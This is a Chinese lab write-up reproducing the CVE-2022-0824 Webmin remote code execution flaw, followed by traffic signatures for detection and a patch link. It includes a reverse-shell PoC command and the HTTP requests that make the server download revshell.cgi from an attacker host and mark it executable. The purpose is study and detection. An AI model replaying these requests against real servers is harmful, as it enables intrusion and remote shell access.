CVE-2022-0824 Webmin 远程代码执行漏洞复现

目录

0x01 声明:

0x02 简介:

0x03 漏洞概述:

0x04 影响版本:

0x05 环境搭建:

Vulfocus环境搭建:

漏洞环境搭建:

后台执行:

导入环境:

启动&访问:

​编辑Kali监听:​

0x06 漏洞复现:

POC:

下载地址:

执行POC:

0x07 流量分析:

特征一(强特征):

请求url:

Data参数:

服务端响应:

特征二(弱特征):

客户端请求url:

服务端响应:

特征三(强特征):

客户端请求url:

Data参数

服务端响应:

Message数据:

特征四(强特征):

客户端请求url:

Data参数

服务端响应:

Message数据:

特征五(关联特征):

客户端请求url:

Referer:

服务端响应:

特征六:

0x08 修复建议:


0x01 声明:

仅供学习参考使用,请勿用作违法用途,否则后果自负。

0x02 简介:

Webmin是功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。Webmin让您能够在远程使用支持HTTPS (SSL 上的 HTTP)协议的 Web 浏览器通过 Web界面管理您的主机。

Webmin是一个功能强大且灵活的基于 Web 的服务器管理控制面板,适用于类Unix系统。Webmin允许用户配置操作系统内部,例如用户、磁盘配额、服务或配置文件,以及修改和控制开源应用程序,例如Apache HTTPServer、PHP或MySQL。

0x03 漏洞概述:

Webmin是Webmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。webmin1.990之前版本存在权限提升漏洞,该漏洞源于错误的程序对高级本地过程调用。攻击者可以利用该漏洞能够修改操作系统文件系统并以运行应用程序权限执行操作系统命令。

0x04 影响版本:

Webmin < Webmin Webmin1.990

0x05 环境搭建:

Vulfocus环境搭建:

参考这篇文章:(Vulfocus漏洞靶场搭建_Evan Kang的博客-CSDN博客)

漏洞环境搭建:

后台执行:

docker pull vulfocus/webmin_cve-2022-0824:latest

导入环境:

CVE-2022-0824 Webmin 远程代码执行漏洞复现_第1张图片

启动&访问:

CVE-2022-0824 Webmin 远程代码执行漏洞复现_第2张图片

 账号:root    密码:password

CVE-2022-0824 Webmin 远程代码执行漏洞复现_第3张图片

CVE-2022-0824 Webmin 远程代码执行漏洞复现_第4张图片Kali监听:CVE-2022-0824 Webmin 远程代码执行漏洞复现_第5张图片 

0x06 漏洞复现:

POC:

下载地址:

https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell

执行POC:

python3 Webmin-revshell.py -t http://192.168.119.155:18033 -c root:password -LS 192.168.119.215:9090 -L 192.168.119.215 -P 7777

CVE-2022-0824 Webmin 远程代码执行漏洞复现_第6张图片

CVE-2022-0824 Webmin 远程代码执行漏洞复现_第7张图片

0x07 流量分析:

特征一(强特征):

请求url:

POST  /session_login.cgi

Data参数:

user=root&pass=password

CVE-2022-0824 Webmin 远程代码执行漏洞复现_第8张图片

服务端响应:

HTTP/1.0 302 Moved Temporarily

CVE-2022-0824 Webmin 远程代码执行漏洞复现_第9张图片

特征二(弱特征):

客户端请求url:

GET /

服务端响应:

HTTP/1.0 200 Document follows

CVE-2022-0824 Webmin 远程代码执行漏洞复现_第10张图片

特征三(强特征):

客户端请求url:

POST /extensions/file-manager/http_download.cgi?module=filamin

Data参数

link=http%3A%2F%2F192.168.119.215%3A9090%2Frevshell.cgi&username=&password=&path=%2Fusr%2Fshare%2Fwebmin

CVE-2022-0824 Webmin 远程代码执行漏洞复现_第11张图片

CVE-2022-0824 Webmin 远程代码执行漏洞复现_第12张图片

服务端响应:

HTTP/1.0 200 Document follows

Message数据:

[{"error":"File with name `revshell.cgi` already exists in `/usr/share/webmin`."}]

CVE-2022-0824 Webmin 远程代码执行漏洞复现_第13张图片

特征四(强特征):

客户端请求url:

POST /extensions/file-manager/chmod.cgi?module=filemin&page=1&paginate=30

Data参数

name=revshell.cgi&perms=0755&applyto=1&path=%2Fusr%2Fshare%2Fwebmin

CVE-2022-0824 Webmin 远程代码执行漏洞复现_第14张图片

CVE-2022-0824 Webmin 远程代码执行漏洞复现_第15张图片

服务端响应:

HTTP/1.0 302 Moved Temporarily

Message数据:

path=%2Fusr%2Fshare%2Fwebmin&module=filemin&error=&page=1&query=&paginate=30&follow=&caseins=&grepstring=&fsid=&exclude=®ex=&all_items=

CVE-2022-0824 Webmin 远程代码执行漏洞复现_第16张图片

CVE-2022-0824 Webmin 远程代码执行漏洞复现_第17张图片

特征五(关联特征):

关联特征四中服务器Message数据的路径

客户端请求url:

GET /extensions/file-manager/list.cgi?path=%2Fusr%2Fshare%2Fwebmin&module=filemin&error=&page=1&query=&paginate=30&follow=&caseins=&grepstring=&fsid=&exclude=®ex=&all_items=

Referer:

http://192.168.119.155:18033/filemin/?xnavigation=1

CVE-2022-0824 Webmin 远程代码执行漏洞复现_第18张图片

CVE-2022-0824 Webmin 远程代码执行漏洞复现_第19张图片

服务端响应:

HTTP/1.0 200 Document follows

特征六:

就是反弹shell的内容了

CVE-2022-0824 Webmin 远程代码执行漏洞复现_第20张图片

0x08 修复建议:

更新到最新版本 附带厂商补丁链接:

https://github.com/webmin/webmin/commit/39ea464f0c40b325decd6a5bfb7833fa4a142e38

你可能感兴趣的:(漏洞复现【Free】,网络安全,web安全,安全威胁分析)